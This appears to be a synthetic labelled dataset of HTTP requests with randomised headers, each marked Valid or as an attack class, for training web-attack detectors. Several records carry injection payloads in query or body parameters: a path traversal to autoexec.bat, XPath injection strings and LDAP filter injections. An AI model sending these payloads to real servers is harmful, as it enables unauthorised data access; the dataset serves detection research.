Via: aeTtst/9.6 114.12.34.91, 5.5 195.4.218.188, 7.3 www.fnh5.gif
Transfer-Encoding: 5spot; idtaF=saBrjuna
Upgrade: 7bns/2.9
Warning: 043 www.eepu.css "fuina4" 
X-Forwarded-For: 252.208.59.218
X-Serial-Number: 57690312658
----: -------------------------
~~~~~: ~~~~~~~~~~~~~

sj35drgo1esrnh=] &bhi=itwxahinmutneo&madeZqtrohg=copytnyt&ssghr=1630&L3iU=vunhritesxb&isodttLefnOpES=er

End - Id: 34318
Start - Id: 32372
class: Valid
GET /yS_c8nPdTfN/xVV9_/reDSuf-/FeG9/nd3Oye2ruugx/u7gtHieayheuaApoHyit/DJuTYldH.mdb?FrexBf=7puia%27etcl7sD&2rt=mitprocessing-instructionusry&neindoosh4i=ehuMbc-u&e3rfgetdtpwjwth=haNtttDfagqDjA0&oooMtltded3=8047469&aHerT2tao3ee=dEe4&tag9arrhF=Ttoahlwp0oafix4m&1qzib=lpfromN+aeoMnhEouiu%3B HTTP/1.1
Host: 82.46.66.133
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.4, compress;q=0.6, identity
Accept-Language: aaopi-7in9mft;q=0.4, l44kEAn-acs, qhu-t35nyho
Cache-Control: only-if-cached
Client-ip: 104.115.242.68
Cookie: e7ihe6tolge=eea1dawI2rceSLuetw;p1ina=urNfrarmetapetp
Cookie2: $Version="300"
Date: Sat, 08 Nov 08 14:22:42 UTC
ETag: "bcP7TEQV0EcuH2331p"
Expect: ifevrnpw=lsoed;huSi=sNi7ezt
From: nTc4g7an@ldne.de
If-Modified-Since: Tue, 31 Mar 09 21:07:04 GMT
If-Unmodified-Since: Wed, 25 Nov 09 07:42:05 UTC
If-Match: "1s3e8rAL4-RDUFq"
If-None-Match: "XwmOZ@yMLiRqz29iPDGq"
If-Range: "VIV7r.0YQ_bJQ7_@O0L"
Max-Forwards: 657
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: NTLM Y2l1YXR0bnBuZWJsaWF5a2VyZW9ucGg5Z3VpbnVlcGRkcmV5dHh0MGkzbw==
Authorization: Basic OWV3anJ5aDplcmI5
Range: -767,36952-,-33
Referer: http://www.mogyceb.biz/4eawee/bhresoc/ttl1i/hosbSdRh.nsf
TE: trailers,trailers,chunked
Trailer: Host
User-Agent: fwlw7 (i_gTyUMUc; mbsZYt8ZTQ)
UA-Disp: 0077,169,16
UA-OS: Solaris
UA-Color: color16
Via: 3.4 84.154.95.176
Transfer-Encoding: gzip
Upgrade: efetu/5.8, xwp/3.1, aeabu/6.7
Warning: 626 www.8nnanJh1.js "cilEofpcabieeSl0p4hz" 
X-Forwarded-For: 36.205.47.170
----: ---------------
~~~~~: ~~~~~~~~~~

null

End - Id: 32372
Start - Id: 45682
class: PathTransversal
GET /glehreee5D/thaerent/zuB1jvMPgZO5ZssSvhIw/2lUot/bo58lYAXvXXdS6/7cghhcidntnse8C/2cG/7oie3AnreczmncoN.jpg?t1ws=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&Paeqsnpfwwi=7532354861 HTTP/1.0
Host: www.corasi.net:752
Connection: Nanuyo
Accept: */*;q=0.9
Accept-Charset: iso-8859-15, windows-1255, windows-1254;q=0.9
Accept-Encoding: *;q=0.9
Accept-Language: oin1d-ei;q=0.9
Cache-Control: max-age=36383
Client-ip: 10.24.0.201
Cookie: NUsystemOOj26PY=<t+e;jhFZvuX5Mformexec=bKfsrM3lxtermi6C<a;onhahtf50t7es=o;bad1wssido=0i0t ;rlatuosgRu=5;bomIl=012
Cookie2: $Version="731"
Date: Sat, 24 Feb 07 22:07:49 UTC
ETag: "oITd6gpcm.9INtKUBAA"
Expect: bEeiah5h=l1sAo
From: esIpsioy@eehlxsang.it
If-Modified-Since: Mon, 19 Jan 09 13:43:57 GMT
If-Unmodified-Since: Tue, 11 May 04 13:41:29 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 16 Sep 04 14:57:47 GMT
Max-Forwards: 26
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="vhio"
Authorization: Basic cmVnR3Jlbm46c21hYWs=
Range: -934,-807,-703421
Referer: /bdcla/hlTeya.mdb
TE: trailers
Trailer: User-Agent
User-Agent: 4CAq2YMf http://www.ra6se.gov
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 488x430
Via: 3.1 161.47.167.37, 3.9 www.riaxe5er.html
Transfer-Encoding: gzip
Upgrade: Weyge/4.5, 12qen/6.1, nL6/9.1, 0dpMle/5.5, aosm8/0.7
Warning: 416 www.s8no.css "erg5ewnaswmt7ceb" "Wed, 30 Jan 08 22:16:24 GMT"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45682
Start - Id: 10692
class: Valid
GET /h-J/ac72caq.js?nhotfecaavimeb=uIr+xhetnec&vaccess_logrFMyKgDrcpX=ahnbon&UHqv=8903463 HTTP/1.0
Host: www.iesex.fr:990
Connection: cee5h
Accept: text/*, image/png;q=0.8, application/*
Accept-Charset: iso-2022-jp, euc-tw, hz-gb-2312;q=0.4, cp-936, windows-1257
Accept-Encoding: gzip;q=0.7, identity;q=0.5, gzip;q=0.3, identity;q=0.1
Accept-Language: 5ulil-atseEee2, 2a-3gi7, onZap-fi, 9n1sw3a-ngwgeh;q=0.8
Cache-Control: max-stale
Client-ip: 245.69.51.123
Cookie: PIGIUL1Ik=?u4ac646j7i;M67XYhttpsnxXJKn=eNTY;drboefbe8=9816;f6demneimity=prwy;)twp-lI nph-O8ei;o6cnryAcnc=aallvn-aeuorw;nhoigc=403
Cookie2: $Version="845"
Date: Thu, 19 May 05 12:20:13 GMT
ETag: W/"G-TQ9WbGjx9xh19GgPym"
Expect: 100-continue
From: spyi@hEtfsnh.ch
If-Modified-Since: Fri, 03 Apr 09 20:36:27 CET
If-Unmodified-Since: Sat, 18 Aug 07 20:34:05 UTC
If-Match: *
If-None-Match: "K-2phcN5XOsORF985yFN"
If-Range: *
Max-Forwards: 607
MIME-Version: 0.7
Pragma: aatyel=T6tnrl
Proxy-Authorization: Basic YW5uTnNhYzp3c2Vvd3Nz
Authorization: NTLM bnc2b2x0YU5hc2hubnRnbnRsdE90b2RoNHJzbG9vZWJ6dzJh
Range: 569080-9470,36135-,7-
Referer: http://war1t.it/lpSiupvi/raYhmRn/7asyf.mspx
TE: trailers
Trailer: Accept-Language
User-Agent: theaaeioritsa
UA-CPU: 68000
UA-Disp: 8769,6775,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 265x4245
Via: drz2/7.7 57.47.155.203, arnn4l/0.4 www.zehs0Us.gif
Transfer-Encoding: deflate
Upgrade: zjyco/2.1, aimb/3.0
Warning: 570 www.ilst.tiff "wuni9is1t9" 
X-Forwarded-For: 87.119.214.253
X-Serial-Number: 776657072780
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10692
Start - Id: 48515
class: XPathInjection
POST /iQLW8lBgJTz1qV/dsteei/rCist/teirwlf3enuDAQ/xatSeu7waK/yosthdtP5z3ho/oP8C/7NzMm/i4/t8vI-UKH2FN.htm? HTTP/1.0
Content-Length: 260
Content-Language: s
Content-Encoding: deflate
Content-Location: /aaxa.ace
Content-MD5: TWF5bmlhY29sQWxuZmg5bg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 May 10 21:08:21 UTC
Last-Modified: Sat, 27 Feb 10 05:37:09 GMT
Host: 163.66.180.118:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 171.224.239.130
Cookie: ouds1=eee<;hocyitkhs=2085
Cookie2: $Version="2"
Date: Sun, 24 Jan 10 09:55:06 UTC
ETag: "QGySzSQMbkDL5SpLi"
Expect: pdaiytge=ttintxkT;rkEAm
From: ndy1yIc@htecd7n.uk
If-Modified-Since: Fri, 01 Jun 07 16:14:51 GMT
If-Unmodified-Since: Tue, 22 Feb 05 22:54:44 GMT
If-Match: *
If-None-Match: "nF.LSAMBYm1djvYQn5Z"
If-Range: Mon, 04 Sep 06 11:26:15 CET
Max-Forwards: 244
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Basic ZXNycGVkOmNxbU8=
Authorization: dLedL1 9at7e=pu3pp5
Range: 811682-312,0-
Referer: http://www.strraid.gov/mmao/1ulf90a/UgcDi.htm
TE: gzip;q=0.2,trailers
Trailer: Accept-Charset
User-Agent: n5fJNBs http://www.cwodn.it
UA-CPU: Sparc
UA-OS: Solaris
UA-Pixels: 951x0046
Via: 4.4 41.93.20.75, 7.2 223.227.82.179
Transfer-Encoding: deflate
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 7572286452988
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

panmee=eytnju_V&E9GRAyUK91=(i  <   count(fuOela/child::text())     and     j <     count(r6/child::comment())    and  k   <    count(vHcis/child::*)  )&0emho=dUK4GiBx1qs&etn=046955&eefae=ns&ntApvea=Tr8srldrt @s

End - Id: 48515
Start - Id: 38658
class: LdapInjection
GET /ng5WXQBub2gmreFbn/jacEwf5iasmuo4saeeuh/hl6tfrys1Xpct.jpeg?6t8eozasotN=gr8hnDpentwey1&kcHQ=%29%28+%7C++++%28++cn%3D*o+++%27brien*++++%29%28mail%3D*o%27brien*%29+++&ytaecoa=c9zNTr78&muvKSunion=8729&hyseyieihilolh=2neatdeb&nrhco9eu1h=eaKfqca&Zeoiherdqfss9=h_5 HTTP/1.0
Host: www.ostudnidx.org:03
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: femtje-ahae, ech-ee, 4ncrato-l;q=0.7
Cache-Control: min-fresh=1
Client-ip: 4.62.251.210
Cookie: tN1ceafehutcr1o=no hisee;5tb=i=Ae0aet )homee
Cookie2: $Version="360"
Date: Mon, 09 May 05 19:49:34 UTC
ETag: W/"NDTNAThFdSCA-p."
Expect: aero=c3tei1ta;Aetl
From: 0dbnE@pDEweao.biz
If-Modified-Since: Sun, 03 Jun 07 24:33:36 GMT
If-Unmodified-Since: Sun, 04 Feb 07 02:53:05 CET
If-Match: *
If-None-Match: "aQporVpJiu_M_E7c27fM"
If-Range: Thu, 28 Feb 08 14:52:46 GMT
Max-Forwards: 423
Pragma: e=E
Authorization: NTLM ZG50MG91dGFlZGFyYzludGxlbm9uZUlJaHVsYzdpZWVzbE92MHJpenNuZ24=
Range: -3789,-5,300-00360
Referer: /fitg.sh
TE: gzip,trailers,trailers
User-Agent: rtah (nsd3BVg; ufOPYL)
----: -----------------

null

End - Id: 38658
Start - Id: 17818
class: Valid
GET /agsenai0ldeogyrsba/PsJ/e138O-aawOEuwp-l@/Taaamuveus/erms3ewrehtc/nh/wTFKez/6hDExwh1ooEmxug/s24LtfnIQCqN/lIzGndyoQ8-EQ/thFSTw67gsMs.dll?idReF=%3BOnwhe7%26irtsihOehv&dfeiaap=573733654 HTTP/1.0
Host: 178.37.241.249
Connection: close
Accept: */*;q=0.3
Accept-Charset: koi8-r, x-mac-chinesesimp;q=0.9
Accept-Encoding: *
Accept-Language: ii7eto-ts;q=0.3, d-iw;q=0.4, jvnntRsi-yiakt, in-zb, egXyiZ-k4Nlrshi;q=0.7
Cache-Control: no-transform
Client-ip: 161.131.239.25
Cookie: SnOeuy=a;ooevOtrmul9r=otrnke;fiatpw5fqro0=Davrbinftv
Cookie2: $Version="799"
Date: Mon, 12 Oct 09 08:40:40 CET
ETag: W/".9UCvugbNDMJE2A"
Expect: ugelm
From: khupg@oosaf.ch
If-Modified-Since: Tue, 19 Apr 05 09:00:16 CET
If-Unmodified-Since: Mon, 26 Sep 05 06:24:04 CET
If-Match: *
If-None-Match: "uq9Yu5H@Gd9WWcVfaN"
If-Range: Sat, 16 Dec 06 13:26:18 CET
Max-Forwards: 67
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM ZXRlZGxtdGxlYWZ3ZXhsdWhqdGVTODhmdHRnZWF5YWVrZWxkOUxycm50Z3lRb2c=
Range: 76827-723747,02-548
Referer: http://soxiyje.biz/aLnbstss/uyslzta/ed9esao.aspx
TE: chunked;q=0.7,trailers
Trailer: Pragma
User-Agent: e3hets (scUPwjt; iuZceqYyn.)
UA-CPU: StrongARM
UA-Disp: 2638,7610,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 5851x4890
Via: 2.1 13.36.150.146
Transfer-Encoding: identity
Upgrade: 0e1dxo/9.3, 9olo/5.1
Warning: 772 19.4.250.196 "a2huUdChiyr6hamrt" 
X-Forwarded-For: 7.104.70.87
X-Serial-Number: 168409741956
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17818
Start - Id: 38228
class: LdapInjection
GET /81XMc2-mug/winntN6Oi4V5idincludeWZc@/rrXNHpvFZ/bxY5Z.mdb?7wkTOtu9=7468&iaeq=g+&oi7ssl6crSe=67345&niasom0n3z84eln=EhtlSehtpassopen&Ra=7&SG3C=q%40W6nvsNSoCL&eceakvaai=nLdcLYyryC&tOcnhlUlTbnee8l=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&ioeunh9ndtietta=413426&el4t=nahCh&rsnrHomcrowpfr=16 HTTP/1.0
Host: 245.166.163.166
Connection: close
Accept: text/*, audio/*, audio/*;q=0.8
Accept-Charset: *
Accept-Encoding: deflate;q=0.2, gzip, deflate
Accept-Language: hhdza1ld-rrhpu6Eq;q=0.9, os-4;q=0.9, oho-iqe
Cache-Control: only-if-cached
Client-ip: 63.201.6.101
Cookie: HF8b6http1=6389;dJuntnt=75pgekoesY9tObtvno;eenyoe3fvcc=eoin;rss=sddtypataNnoubi4;sedeed=ue;EdI57ornAnia=0975
Cookie2: $Version="541"
Date: Fri, 04 Mar 05 06:29:33 UTC
ETag: "HeHqGgYUuhkexda"
Expect: 100-continue
From: Oni9Cjt@Idhlgm9aom.net
If-Modified-Since: Fri, 30 May 08 05:03:29 UTC
If-Unmodified-Since: Fri, 04 Sep 09 13:25:59 CET
If-Match: "l3Wr.s4F_oiop.mOHf"
If-None-Match: "MiPRWgygrTK_OII6"
If-Range: Sat, 10 Oct 09 06:00:15 GMT
Max-Forwards: 13
MIME-Version: 6.4
Pragma: yxaB6oui='iOp'
Proxy-Authorization: olshew aitLt=niTeot
Authorization: Basic cm9pbmVzaTptZG9zbQ==
Range: 491-,605-2708,157323-67914
Referer: /Ywkeo8Tu.swf
TE: trailers
Trailer: Accept-Charset
User-Agent: pdnxueto/2.4.2.5
UA-CPU: StrongARM
UA-Disp: 5667,2371,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 4467x673
Via: FTP/9.6 153.243.239.113, HTTP/2.0 27.189.123.231, 9.2 232.132.70.100
Transfer-Encoding: kOctU; tnllhi=a1the
Upgrade: sdlwO/6.2, 4Awth/6.5, lsy/1.6, jri/4.6
Warning: 794 74.86.217.193 "6bkyotjee" "Mon, 16 Feb 09 06:30:50 GMT"
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 3952858356016801
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38228
Start - Id: 19418
class: Valid
GET /tXc_R7dHXlUsj5Qipf7/cabedr1pIrwOioj/kdenaltrath2saau19si.html?meeEe=79&one9oTi=95892&auEytd=coa+ec+b&toHehujn=6DXs68G&iStm8ellatEsl=1IvBqjvWXHk&esreasnq54a=23&rznhai=duhe HTTP/1.0
Host: www.ArmOokhfhg.st
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: cp-932;q=0.3
Accept-Encoding: 
Accept-Language: log-n2o4r, mfold-rhot;q=0.8, n4sor-o, etrgMgkC-ie;q=0.7, rr-saon
Cache-Control: no-cache
Client-ip: 171.196.246.32
Cookie: rajhtw=9tedstxp_;j7PIq4T=yH9s0JLr;27I2Stiyoubeo=14;eprtiy7seimejkq=3359239972;aNT=t;aphjeenetedw0v=ohojttrkstiiene
Cookie2: $Version="443"
Date: Tue, 28 Oct 08 19:55:38 UTC
ETag: "4fBtkGnN1iC7-i7nSOa"
Expect: Aayeaeu
From: unsxob@wuKtvh6Lni.com
If-Modified-Since: Thu, 28 Feb 08 01:20:37 CET
If-Unmodified-Since: Sun, 18 Jan 04 14:52:44 GMT
If-Match: "@lQuzc4RGiFGh6ghbUmT"
If-None-Match: *
If-Range: "WCyM1uZHzQ5dM8D"
Max-Forwards: 34
MIME-Version: 6.8
Pragma: svcls=lnteinEa
Proxy-Authorization: Digest nc=a68EDdAa
Authorization: NTLM ZXR4ZmR1d05hQzVyYTFMZThscjBPdGVSdXBsNHNkdGVwYXRzaGV4dGRz
Range: -6815,05-
Referer: http://8Wmp.com/iece.mp3
TE: trailers
Trailer: Expect
User-Agent: faebgse (x@1E-yQ@zS; as9@Jqr; oUthj5L; 4xANP0j0_E; tepkLZ)
UA-CPU: x86
UA-Disp: 818,3466,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 6070x723
Via: FTP/8.8 162.53.230.231
Transfer-Encoding: r6hciN
Upgrade: 3tDr/0.3, octa/6.4
Warning: 973 68.135.26.164 "5tEeaernaeouo" 
X-Forwarded-For: 242.54.249.88
X-Serial-Number: 55136594
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 19418
Start - Id: 38090
class: LdapInjection
GET /w.1xO-iHuKdRb05/SmJsZE/det/scriptRp_lst.GZbody/iwsW0e.png?tedmIea=6ead%29%28++++%7C%28ga%3D*%29&f9snUimDie=ercwinnty+Ronni4n&fl2ba=NNgemsthtdldrbn&s9fc1daasae=c+arSnd+aea&kLdiv0telnet=pXInrfi&y7=nsothiUleoanv&HZQaccess_log8X1fC=+Z0wd%5D%7Etheobleoe+&ye=2869&i1dRseseoo4atwt=u2UerUJ&8eeq8tdtunhatq=aMVFFN&eht=cat9an1m&aiOnfletAlAs=euiQeloe HTTP/1.1
Host: 193.248.173.235
Connection: h7Thsug
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, deflate, identity, identity;q=0.9
Accept-Language: xez9n-dihnen, cltmt8-t4lt;q=0.8, eteTugw-e;q=0.9, oeizn-ooR6, ts6l-1tsE
Cache-Control: xit='kxu70zo'
Client-ip: 209.94.206.107
Cookie: vHuabrUdnsE=02854068;t5n=25;o1amlwrMnr=e;zay07zzrlMt=7448624;aZqSCrr6itql=iRlKa
Cookie2: $Version="74"
Date: Sun, 23 Jul 06 18:39:23 GMT
ETag: W/"WFlRn2_F0qiz2qXuNMV"
Expect: 100-continue
From: oaitn@wnslnp.com
If-Modified-Since: Thu, 24 Feb 05 12:37:03 CET
If-Unmodified-Since: Sat, 05 Jun 04 20:20:03 UTC
If-Match: *
If-None-Match: "VY4b1@kUvPJqLaX@SG"
If-Range: *
Max-Forwards: 9
MIME-Version: 7.3
Pragma: 2eiNanEg=sena7dln
Proxy-Authorization: Basic VDQ5QTpieGVt
Authorization: Basic dXRldHM6eVRhZ2lobGg=
Range: 77-,76-
Referer: /Cmgm7y/dehbiolf/thoedr6/iiddiao/oe22hoo.gif
TE: deflate,trailers
Trailer: Pragma
User-Agent: Mozilla/2.9 (Windows; U; Win 9x 4.1; ru-kl; rv:1.9.7) Gecko/44898556
UA-CPU: 68000
UA-Disp: 119,1491,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3700x2595
Via: 1.0 81.223.53.197, HTTP/5.2 www.IeeEe.jpg, HTTP/6.6 98.168.5.53
Transfer-Encoding: 4nis; ohirt=itsrh2
Upgrade: sS7i/3.2, haaoxa/5.4, fair/8.2
Warning: 525 www.tntaivc.png "taaisanteflseGtnsd" "Thu, 10 Jun 04 12:50:10 UTC"
X-Forwarded-For: 42.181.165.201
X-Serial-Number: 814494240740
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38090
Start - Id: 31100
class: Valid
GET /Eo/al/fQuf1xl/es2.shtml?be=126 HTTP/1.0
Host: 17.185.201.211
Connection: close
Accept: video/*, audio/x-wav, video/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 11.133.74.44
Cookie: irnuryinoa=t9-;nhoetsonu=3yhhmxnOgooo;rhee4esc2Ieri=ronanqdeneEhent
Cookie2: $Version="015"
Date: Tue, 03 Feb 04 21:35:33 UTC
ETag: W/"fy0wv_z.5OYL66E-Zbyx"
Expect: 100-continue
From: on158@eef4s.gov
If-Modified-Since: Thu, 21 Feb 08 17:17:21 UTC
If-Unmodified-Since: Thu, 16 Aug 07 16:38:36 UTC
If-Match: *
If-None-Match: "srA8lqHIB06iLfTm"
If-Range: "L187KFjl.oF.tcUJ."
Max-Forwards: 70
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic clNjbzpuNWVl
Authorization: mEop6 4nKe3=sael
Range: 2-
Referer: http://www.erltmt.be/iaax/calS/e02iam.php
TE: trailers,deflate;q=0.6,trailers
Trailer: TE
User-Agent: a2ieuo6cR
UA-CPU: PowerPC
UA-Disp: 334,6065,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1573x3760
Via: HTTP/8.8 www.v0eer.gif:734, Iis/0.0 241.154.191.219
Transfer-Encoding: identity
Upgrade: Vpd/5.7, eiJ/4.6, lehe/1.0
Warning: 311 221.48.91.250:29839 "hOdjuaaVchtteasa" "Thu, 31 Jan 08 03:52:06 UTC"
X-Forwarded-For: 80.59.235.174
X-Serial-Number: 30237694505
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31100
Start - Id: 49717
class: XPathInjection
GET /sRG6S3H@IU_9X.css?fZGVgconnect53vbscriptAP=caoeA3if%27++or++nin%2Fyo%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D47%5D++++or+++++%27ic2mk7n%27++%3D%27&tdnduilG=8em&9tehqeze6hh=oiAshutdownsps&Iy8an2woCar9=eef7mile&eltnopia=4eeAy01ne HTTP/1.0
Host: 166.5.81.186
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: wndn0fSe-ts4dpa, fner-L
Cache-Control: no-store
Client-ip: 108.36.71.41
Cookie: yut=e_@s.WGsu0t5
Cookie2: $Version="395"
Date: Fri, 14 Nov 08 10:03:28 UTC
ETag: "iITkPXqitf-bCHofqIg"
Expect: 100-continue
From: u5ln@onsTkmM.ch
If-Modified-Since: Sat, 13 Jun 09 12:30:34 UTC
If-Unmodified-Since: Sat, 17 Apr 10 19:42:53 UTC
If-Match: *
If-None-Match: "hUUge31XwwYWv51BT7v"
If-Range: Sun, 18 Dec 05 09:49:49 GMT
Max-Forwards: 954
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="iest9re"
Authorization: Digest algorithm=rasur2N
Range: -5,-8543,85-24971
Referer: http://ciUsy.net/yisip/s7dsndib/i9ent/rAao.ace
TE: gzip;q=0.4,chunked,gzip
Trailer: Accept-Charset
User-Agent: s81rletnt (tiaPBOhFj7; dho_6SIXFQ; a2EjUHSNw)
UA-CPU: StrongARM
UA-Disp: 731,8185,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6094x1402
Via: 4.5 62.242.219.94, 8.0 www.wxapd.tiff, 2.1 38.154.240.4
Transfer-Encoding: lior4
Upgrade: Hr0ss/7.8, oseam/8.9, h6x/4.2
Warning: 018 www.iupl6.jpg "b3zD8yiorsn" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 9273829516846529
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49717
Start - Id: 22386
class: Valid
GET /fQXR3.8ug3nZ/eHRzK@KT_kgCmt/oFcHUhF4EZraLbO8bJT/dEft-D/dot/dhk/eBT.g.dll?nlo=226&mh=60606958&eM8jpLlems=106&ocoae=6mmFeK&G1aNgBg2=7795393515&scriptpUolZ=rhkeEmlE2o6nsBeu&iantaaapm=hhavingtn&ifhtltate=nvzi HTTP/1.0
Host: 25.166.221.165
Connection: close
Accept: audio/basic
Accept-Charset: x-mac-arabic, x-mac-chinesetrad, x-mac-chinesesimp;q=0.9
Accept-Encoding: compress, identity, gzip;q=0.4, compress, identity;q=0.6
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 189.228.119.233
Cookie: eel=9;cntltness=nHcdBtED8;stkatqntiwozn=205791;eeydwnIgmt9a=a@p i  autoexec';sknf3an=lDu3tqp0un
Cookie2: $Version="985"
Date: Sat, 24 May 08 23:48:29 CET
ETag: W/"Y5RGtFB@yPNp@.6@drPI"
Expect: mehpgn
From: Thg1b@weOoea0a.org
If-Modified-Since: Fri, 12 Jan 07 24:47:16 GMT
If-Unmodified-Since: Tue, 26 Jul 05 20:21:49 UTC
If-Match: "NMrAdTcTTSpxGYJgmDP"
If-None-Match: *
If-Range: Fri, 11 May 07 04:32:20 UTC
Max-Forwards: 13
MIME-Version: 2.1
Pragma: 6ea='tye'
Proxy-Authorization: Digest uri=http://oaaa.com/neutur/gmqe/y1hen1/oiewude2/t2mmveSO.pdf
Authorization: mgs7 rljd4ng=R36nzmnH
Range: 27-495
Referer: http://nphn.de/O9oesxcN/qeraie/ohit1c/iRried0h.pl
TE: trailers
Trailer: Accept-Encoding
User-Agent: ej3SydNf9@ http://www.xnpoo.gov
UA-CPU: x86
UA-Disp: 1777,9655,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 112x1566
Via: 85zs/3.2 www.Eet4cS.jpeg
Transfer-Encoding: compress
Upgrade: anin8s/5.0, 42tdtt/2.9, tMob/9.6, 6sg/5.1
Warning: 201 200.172.85.148 "uwxb7lfeBdn3mteneoad" "Thu, 28 Sep 06 02:25:40 GMT"
X-Forwarded-For: 7.132.119.46
X-Serial-Number: 570685869927204
----: ----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 22386
Start - Id: 5073
class: Valid
POST /uXKCFa7-Zsm/9uhMnrinEnnree/qIosAJhtsomt/o6/nhie/mzqEhKLhj/hnigX.j/u7YiaK_vVQzgRfY.dll? HTTP/1.0
Content-Length: 128
Content-Language: ncmeina
Content-Encoding: identity
Content-Location: http://adcmm.be/wdlrp/dt6aohcp/OR7orhx/delansd.jpg
Content-MD5: YWFnb21ldWtxaWVlaVR3VQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 11 Apr 05 23:17:53 GMT
Last-Modified: Thu, 28 Apr 05 05:58:08 UTC
Host: 128.152.81.96:7
Connection: keep-alive
Accept: audio/*;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: iEeT-t4etosf, aouc-ltese8br;q=0.8, 5dw-3eesbumr, ntas5sm-casoanOa;q=0.0, fhrru-lioxve
Cache-Control: no-transform
Client-ip: 153.25.49.88
Cookie: b0rjW0yPN_=3;ate4=rms;ttlrmxHHrOt=s;8blrenptpgqIer=wf:ts
Cookie2: $Version="801"
Date: Sun, 02 Jul 06 08:00:36 CET
ETag: "ysQeb7HLdpYvo.M2T"
Expect: 100-continue
From: rbDpahs@ipSonalu.biz
If-Modified-Since: Fri, 18 Jan 08 08:13:52 CET
If-Unmodified-Since: Tue, 06 Jun 06 02:22:53 UTC
If-Match: ".0-QoNwa5FcffRQ0729"
If-None-Match: "Z3zpJizC0k65McRw"
If-Range: *
Max-Forwards: 994
MIME-Version: 3.6
Pragma: o9a=ntoiTss
Proxy-Authorization: NTLM dGN1YXVmdXRpRWljaG5ydDNvdHZpZThzdGFCdGhuZXU=
Authorization: Basic aVMydGFoZTplaXBTZXU=
Range: 818-,7964-381
Referer: /euoare/hocen.asp
TE: trailers,gzip;q=0.7
Trailer: Host
User-Agent: 0ise3da (f6khcutUaX)
UA-CPU: PowerPC
UA-Disp: 925,165,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 7508x091
Via: rrmelO/5.5 176.137.76.89:45077
Transfer-Encoding: gzip
Upgrade: fnget0/9.0, Hrn/8.2
Warning: 467 150.166.100.47 "uemut595tnsdte" "Mon, 06 Dec 04 06:40:13 GMT"
X-Forwarded-For: 90.219.143.51
X-Serial-Number: 100173301629912
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ed=lDruoneabgsound&edE=ay|m/&ufetoo=fjms:yhw@TSwacceptpassthrutboot.inilkte&krc6=svoWstvse)nconnectutDTadmin&iyLels=69

End - Id: 5073
Start - Id: 32337
class: Valid
GET /l9B/rbieh8enyaocoswaAeea/n473lmIo@t/F1efA3iCcleshgSngaoe/wxUe.asmx?1iidmtdeH=gaX&A99VopP=9&5rLceoo=660&d.xJBm3=exp_m&e28ie9nlapli=+s+dcaifescripttei8cgbgsoundb%2F&eUu94l=vjZ%40M&mseymrr5hla=eChot1Puatpam8pl&hnrMnwaei3cz=ibFq5D2fp&sgarbr=625293 HTTP/1.0
Host: 192.190.199.25:8802
Connection: dSrA
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.5, iso-8859-8-i
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-transform
Client-ip: 44.81.83.243
Cookie: ois=ofIWSlSwbxb;ye8inetts=38;SyaA=8moenrv3auaostf3s
Cookie2: $Version="91"
